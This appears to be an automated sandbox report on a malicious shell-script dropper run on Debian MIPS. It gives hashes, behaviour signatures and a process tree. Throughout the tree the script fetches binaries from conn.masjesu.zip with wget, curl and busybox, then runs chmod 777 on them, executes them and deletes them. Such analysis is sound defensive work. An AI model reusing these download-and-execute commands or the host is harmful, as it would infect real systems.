Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
85s -
max time network
88s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
15/10/2024, 01:48
Static task
static1
Behavioral task
behavioral1
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
-
Size
10KB
-
MD5
5b7965317583f6ec3ecb200b64ab84dc
-
SHA1
242199969bb87b8f91c50399dbc9a2fcfa918cb9
-
SHA256
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0
-
SHA512
53de4e8bcba6392755c42f5be1d230e71dbcd45fae9f4be439577b82097ac9039117b0ffed7bfe710b8e3bf6546d6c771c9b799d5b0c902e961fd5b43daf05b7
-
SSDEEP
96:YV1hXrraLcgAGdJdVPd2ZdTUcg69wLwsxLxpMLK9XKlK9l90+YWGuaYaUaG1l/VR:PAaSJSds6Pv8EdPvF8kKc
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 751 chmod 912 chmod 968 chmod 976 chmod 817 chmod 880 chmod 888 chmod 920 chmod 928 chmod 936 chmod 768 chmod 896 chmod 1019 chmod 861 chmod 904 chmod 960 chmod 834 chmod 869 chmod 952 chmod 998 chmod 797 chmod 984 chmod 1005 chmod 1012 chmod 1026 chmod 744 chmod 944 chmod 991 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H 745 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM 752 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag 769 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE 798 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x 818 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw 835 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC 862 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn 870 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD 881 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj 889 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA 897 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz 905 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H 913 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak 921 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn 929 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD 937 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj 945 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA 953 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz 961 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H 969 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak 977 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H 985 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM 992 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag 999 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE 1006 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x 1013 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw 1020 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC 1027 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 924 wget 972 wget 748 curl 895 busybox 900 wget 901 curl 916 wget 911 busybox 925 curl 994 wget 995 curl 1023 curl 873 wget 876 busybox 997 busybox 1004 busybox 1008 wget 967 busybox 814 curl 816 busybox 908 wget 919 busybox 956 wget 840 wget 893 curl 964 wget 988 curl 1022 wget 717 wget 743 busybox 866 curl 1016 curl 775 wget 803 wget 917 curl 959 busybox 1001 wget 750 busybox 821 curl 885 curl 932 wget 965 curl 731 curl 884 wget 933 curl 951 busybox 1015 wget 892 wget 909 curl 948 wget 987 wget 980 wget 765 busybox 792 busybox 820 wget 903 busybox 975 busybox 1025 busybox 847 curl 865 wget 935 busybox 957 curl 1009 curl 755 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD curl File opened for modification /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz curl File opened for modification /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC curl File opened for modification /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD curl File opened for modification /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz curl File opened for modification /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H curl File opened for modification /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE curl File opened for modification /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x curl File opened for modification /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj curl File opened for modification /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj curl File opened for modification /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA curl File opened for modification /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak curl File opened for modification /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE curl File opened for modification /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM curl File opened for modification /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag curl File opened for modification /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC curl File opened for modification /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn curl File opened for modification /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H curl File opened for modification /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn curl File opened for modification /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw curl File opened for modification /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak curl File opened for modification /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H curl File opened for modification /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw curl File opened for modification /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H curl File opened for modification /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag curl File opened for modification /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA curl File opened for modification /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM curl File opened for modification /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x curl
Processes
-
/tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh/tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:714
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- System Network Configuration Discovery
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- System Network Configuration Discovery
PID:750
-
-
/bin/chmodchmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵PID:753
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵PID:754
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- System Network Configuration Discovery
PID:765
-
-
/bin/chmodchmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵PID:773
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- System Network Configuration Discovery
PID:775
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:782
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- System Network Configuration Discovery
PID:792
-
-
/bin/chmodchmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵PID:801
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- System Network Configuration Discovery
PID:803
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- System Network Configuration Discovery
PID:816
-
-
/bin/chmodchmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- System Network Configuration Discovery
PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:830
-
-
/bin/chmodchmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:839
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- System Network Configuration Discovery
PID:840
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵PID:856
-
-
/bin/chmodchmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵PID:864
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- System Network Configuration Discovery
PID:865
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵PID:868
-
-
/bin/chmodchmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵PID:872
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- System Network Configuration Discovery
PID:873
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- System Network Configuration Discovery
PID:876
-
-
/bin/chmodchmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵PID:887
-
-
/bin/chmodchmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/chmodchmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- System Network Configuration Discovery
PID:911
-
-
/bin/chmodchmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵PID:923
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- System Network Configuration Discovery
PID:924
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵PID:927
-
-
/bin/chmodchmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵PID:943
-
-
/bin/chmodchmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
